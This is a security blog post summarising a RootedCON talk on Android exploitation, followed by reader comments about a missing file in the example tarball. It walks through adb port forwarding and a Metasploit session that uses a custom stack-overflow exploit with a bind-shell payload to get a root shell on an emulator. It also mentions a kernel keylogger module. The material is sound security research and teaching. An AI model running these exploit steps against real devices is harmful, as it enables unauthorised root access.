Limited Entropy Dot Com Not so random thoughts on security featured by Eloi Sanfèlix


RootedCON: Examples + small summary

It's been almost a month since RootedCON, but I didn't have any time to spend on preparing the .tgz file with the example shellcodes, poc apps and exploits we showed during our talk. And neither did I publish any kind of summary or anything about the event...

You can also find Javi's post on the RootedCON here. It's in Spanish, don't say I didn't warn ;-). You can also find the slides of our presentation here.

Examples from our presentation on Android exploitation

First things first, here is the examples we used during the presentation. As a quick summary, this is how I use the buffer overflow exploit.

First, launch the emulator and wait for it to start. Then, with adb you need to forward a couple of ports: 2000 for the vulnerable apps and whatever you like for your bind shell. Then you can launch the binary, which I had uploaded using adb push to /data/bin/myapp:

eloi@EloiLT:~/android/paper$ adb forward tcp:2000 tcp:2000
eloi@EloiLT:~/android/paper$ adb forward tcp:2222 tcp:2222
eloi@EloiLT:~/android/paper$ adb shell
# /data/bin/myapp

Now, you can launch the exploit from metasploit:

msf > use exploit/linux/misc/android_stack
msf exploit(android_stack) > set payload linux/armle/shell_bind_tcp
payload => linux/armle/shell_bind_tcp
msf exploit(android_stack) > set RPORT 2000
RPORT => 2000
msf exploit(android_stack) > set LPORT 2222
LPORT => 2222
msf exploit(android_stack) > exploit
[*] Started bind handler
[*] Command shell session 1 opened ( ->
[*] Command shell session 1 closed.
msf exploit(android_stack) > exploit
[*] Started bind handler
[*] Command shell session 2 opened ( ->
uid=0(root) gid=0(root)
[*] Command shell session 2 closed.
msf exploit(android_stack) >

The same thing applies to the cpp_challenge demo application. You just use a different exploit, but that's it. Beware that you might have to tune some addresses on your local installation, as they are hardcoded. However, I believe they should be static for every installation.

In addition to apps and the metasploit stuff, you can also find two kernel modules. One is a simple find syscall table module, and the other one is a keyboard logger. The latter only works for linux >= 2.6.28, for earlier versions you need to change it slightly.

RootedCON mini-summary

I won't spend much time on it, as it's been quite some time already and I don't feel like writing a complete summary of it.

Overall I think it was a great event. Sure there is stuff that can be improved as everywhere, but for being the first edition it was very good. From the talks I attended, in my opinion there were great talks but also a one or two I didn't really like. On our side, we are pretty happy with the way it was received and the reactions we have seen 🙂

Besides the talks, and probably even more important, it was great to meet so many people that I'd only know through the Internet otherwise. Cheers to all of you guys, hope to see you next year at RootedCON or maybe earlier somewhere else 🙂

Posted by Eloi Sanfèlix

Comments (4) Trackbacks (2)
  1. The link for the examples is broken 😉

  2. Fuck! Thanks neofito, solved it 🙂 I uploaded it with a name and then renamed it but forgot to change the link in the post :$


  3. There are a few files missing from the tarball. (that are listed in the readme)

  4. Oops! I’m such a mess… haha

    I didn’t realize before. Javi told me earlier this week that the encoder was missing and I told him I’d upload it, but now I’ve checked the tarball and as you mention there are things listed in the readme that are not there.

    The main reason is that the README contained my own notes during the development and when Javi and me were sharing things hehe. Anyway, the most important missing part is the encoder.

    I’ll find it and re-upload the tarball during today.

    Thanks for noting it!

Leave a comment